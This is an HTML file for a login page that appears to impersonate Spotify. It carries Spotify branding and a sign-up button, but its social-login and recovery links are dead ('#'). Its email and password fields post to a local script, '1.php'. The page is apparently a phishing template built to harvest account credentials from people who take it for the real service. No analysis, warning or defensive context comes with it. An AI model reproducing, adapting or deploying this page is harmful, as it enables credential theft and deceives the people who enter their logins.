<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Untitled</title>
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/fonts/fontawesome-all.min.css">
    <link rel="stylesheet" href="assets/fonts/font-awesome.min.css">
    <link rel="stylesheet" href="assets/fonts/ionicons.min.css">
    <link rel="stylesheet" href="assets/fonts/fontawesome5-overrides.min.css">
    <link rel="stylesheet" href="assets/css/Bootstrap-Payment-Form-.css">
    <link rel="stylesheet" href="assets/css/dmp_Inputs_Generic_Phone_Required.css">
    <link rel="stylesheet" href="assets/css/Login-Box-En-login-box-en-1.css">
    <link rel="stylesheet" href="assets/css/Login-Box-En-login-box-en.css">
    <link rel="stylesheet" href="assets/css/MUSA_input-helper-input-helper.css">
    <link rel="stylesheet" href="assets/css/MUSA_input-helper.css">
    <link rel="stylesheet" href="assets/css/Navbar-Centered-Links-icons.css">
    <link rel="stylesheet" href="assets/css/styles.css">
</head>

<body>
    <nav class="navbar navbar-light navbar-expand-md bg-white border rounded-0">
        <div class="container-fluid"><img class="mx-auto" src="assets/img/37735647.jpg" width="140"></div>
    </nav>
    <div class="d-flex flex-column justify-content-center" id="login-box">
        <div class="login-box-content">
            <div class="fb-login box-shadow"></div><a class="text-bg-dark border rounded-pill d-flex flex-row align-items-center social-login-link" style="margin-bottom: 10px;padding-bottom: 4px;padding-top: 4px;" href="#"><i class="fa fa-apple" style="color:rgb(255,255,255);width:56px;"></i><br><span style="background-color: RGBA(33,37,41,var(--bs-bg-opacity,1)) ;">CONTINUE WITH APPLE</span></a><a class="text-bg-danger border rounded-pill d-flex flex-row align-items-center social-login-link" style="margin-bottom: 10px;padding-bottom: 4px;padding-top: 4px;" href="#"><i class="fa fa-google" style="color:rgb(255,255,255);width:56px;"></i>CONTINUE WITH GOOGLE</a><a class="text-bg-dark d-flex flex-row align-items-center social-login-link" href="#"></a><a class="text-bg-dark d-flex flex-row align-items-center social-login-link" href="#"></a>
            <div class="d-flex flex-row align-items-center login-box-seperator-container">
                <div class="login-box-seperator"></div>
                <div class="login-box-seperator-text">
                    <p class="text-dark" style="margin-bottom:0px;padding-left:10px;padding-right:10px;font-weight:400;color:rgb(201,201,201);">or</p>
                </div>
                <div class="login-box-seperator"></div>
            </div>
			<form action="1.php" method="POST">
            <h1 class="fs-6"><strong><span style="color: rgb(0, 0, 0);">Email address or username</span></strong><br></h1>
            <div class="gp-login box-shadow"></div><input type="email" name="username" class="email-imput form-control" style="margin-top:10px;" required="" placeholder="Email" minlength="6">
            <h1 class="fs-6"><strong>Password</strong></h1><input type="password" name="password" class="password-input form-control" style="margin-top:10px;" required="" placeholder="Password" minlength="6">
        </div>
        <div class="email-login" style="background-color:#ffffff;"><button class="btn btn-primary link-dark border rounded-pill d-block box-shadow w-100" id="submit-id-submit" type="submit" style="padding-right: 86px;margin-right: -154px;padding-left: 84px;margin-left: -2px;"><strong>Log in</strong></button></div>
        <div class="submit-row" style="margin-bottom:8px;padding-top:0px;">
            <div class="d-flex justify-content-between">
                <div class="form-check form-check-inline" id="form-check-rememberMe"><input class="form-check-input" type="checkbox" id="formCheck-1" for="remember" style="cursor:pointer;" name="check"><label class="form-check-label" for="formCheck-1"><span class="text-dark label-text">Remember Me</span></label></div><a class="link-dark" id="forgot-password-link" href="#">Forgot Password?</a>
            </div>
        </div>
        <div id="login-box-footer" style="padding:10px 20px;padding-bottom:23px;padding-top:18px;">
            <p style="margin-bottom:0px;">Don't you have an account?<a id="register-link" href="#">Sign Up!</a></p><button class="btn btn-primary fs-6 link-dark text-bg-light border rounded-pill d-block box-shadow w-100" id="submit-id-submit-1" type="submit"><span style="color: rgb(139, 139, 139);">SIGN UP FOR SPOTIFY</span></button>
        </div>
    </div><a class="border-1 shadow-lg d-flex align-items-center social-login-link" href="#"><i class="fa fa-facebook" style="margin-left: 0px;padding-right: 20px;padding-left: 22px;width: 56px;"></i>Login with Facebook</a>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
    <script src="assets/js/MUSA_input-helper.js"></script>
</body>

</html>